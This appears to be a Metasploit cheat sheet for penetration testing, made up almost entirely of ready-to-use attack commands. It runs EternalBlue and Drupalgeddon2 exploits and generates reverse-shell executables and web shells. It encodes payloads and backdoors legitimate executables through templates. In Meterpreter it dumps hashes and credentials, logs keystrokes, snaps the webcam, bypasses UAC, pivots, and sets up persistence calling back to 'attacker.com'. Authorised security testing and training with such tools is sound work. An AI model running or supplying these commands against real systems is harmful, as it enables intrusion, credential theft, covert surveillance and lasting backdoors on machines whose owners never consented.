Metasploit Framework
Metasploit is a penetration testing framework that makes hacking simple.
Installation
# Debian/Ubuntu
sudo apt install metasploit-framework
# Update
sudo msfupdate
# Kali Linux (pre-installed)
msfconsole
Basic Commands
Starting Metasploit
Navigation
# Search
search <keyword>
search type:exploit platform:windows
# Use module
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
show advanced
show payloads
# Set options
set RHOSTS 192.168.1.1
set RPORT 445
set LHOST 192.168.1.100
set LPORT 4444
# Show targets
show targets
set TARGET 0
# Check if target is vulnerable
check
# Run exploit
exploit
run
Scenarios
# Quick SMB version scan across a subnet
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
# Check and exploit MS17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
check
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit
# Exploit a web app and catch a shell
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.1.20
set TARGETURI /drupal
set LHOST 192.168.1.100
run
# Suggest local privilege escalation modules
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Pivot with autoroute and SOCKS proxy
use post/multi/manage/autoroute
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
Modules
Exploit Modules
# Search exploits
search type:exploit
# Popular exploits
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/http/rejetto_hfs_exec
use exploit/multi/handler
use exploit/unix/webapp/drupal_drupalgeddon2
Auxiliary Modules
# Port scanning
use auxiliary/scanner/portscan/tcp
# SMB scanning
use auxiliary/scanner/smb/smb_version
# FTP scanning
use auxiliary/scanner/ftp/ftp_version
# HTTP scanning
use auxiliary/scanner/http/http_version
# Brute force
use auxiliary/scanner/ssh/ssh_login
Post-Exploitation Modules
# Gather credentials
use post/windows/gather/credentials/credential_collector
# Hashdump
use post/windows/gather/hashdump
# Enum system
use post/windows/gather/enum_system
# Screenshot
use post/windows/gather/screen_spy
# Keylogger
use post/windows/capture/keylog_recorder
Payloads
List Payloads
# Show available payloads
show payloads
# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Common Payloads
# Windows
windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_https
windows/shell/reverse_tcp
windows/x64/meterpreter/reverse_tcp
# Linux
linux/x86/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
linux/x86/shell/reverse_tcp
# Multi-platform
generic/shell_reverse_tcp
Meterpreter
Basic Commands
# System information
sysinfo
getuid
# Process information
ps
getpid
# File system
pwd
ls
cd
cat
download
upload
search -f *.txt
# Networking
ipconfig
route
portfwd
# Execute commands
execute -f cmd.exe -i
shell
Privilege Escalation
# Check privileges
getprivs
# Attempt auto-escalation
getsystem
# Bypass UAC
background
use exploit/windows/local/bypassuac
set SESSION 1
exploit
Post-Exploitation
# Dump hashes
hashdump
load kiwi
creds_all
# Screenshot
screenshot
# Webcam
webcam_list
webcam_snap
# Keylogger
keyscan_start
keyscan_dump
keyscan_stop
# Migrate process
ps
migrate <PID>
# Persistence
run persistence -X -i 60 -p 4444 -r attacker.com
Pivoting
# Add route
route add 10.10.10.0 255.255.255.0 <SESSION_ID>
# Port forwarding
portfwd add -l 8080 -p 80 -r 10.10.10.10
# Autoroute
use post/multi/manage/autoroute
set SESSION 1
exploit
# SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 4a
exploit
MSFVenom
Generate Payloads
# List formats
msfvenom --list formats
# Windows executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
# Linux executable
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
# JSP web shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.jsp
# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war
# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.py
# PowerShell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o shell.ps1
Encoders
# List encoders
msfvenom --list encoders
# Encode payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -f exe -o encoded.exe
# Multiple iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded.exe
Templates
# Inject payload into template
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x template.exe -f exe -o backdoored.exe
# Keep template behavior
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x template.exe -k -f exe -o backdoored.exe
Multi/Handler
# Set up listener
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit -j # Run as job
# List jobs
jobs -l
# Kill job
jobs -k <ID>
# Session management
sessions -l # List sessions
sessions -i <ID> # Interact with session
sessions -K # Kill all sessions
Database
# Initialize database
msfdb init
# Check status
msfdb status
# Connect to database
db_connect
# Workspace management
workspace
workspace -a pentest
workspace pentest
# Import scan results
db_import scan.xml
# Hosts
hosts
hosts -a 192.168.1.1
# Services
services
services -p 445
Resource Scripts
# Create resource script
echo "use exploit/multi/handler" > handler.rc
echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.100" >> handler.rc
echo "set LPORT 4444" >> handler.rc
echo "exploit -j" >> handler.rc
# Run resource script
msfconsole -r handler.rc
# From msfconsole
resource handler.rc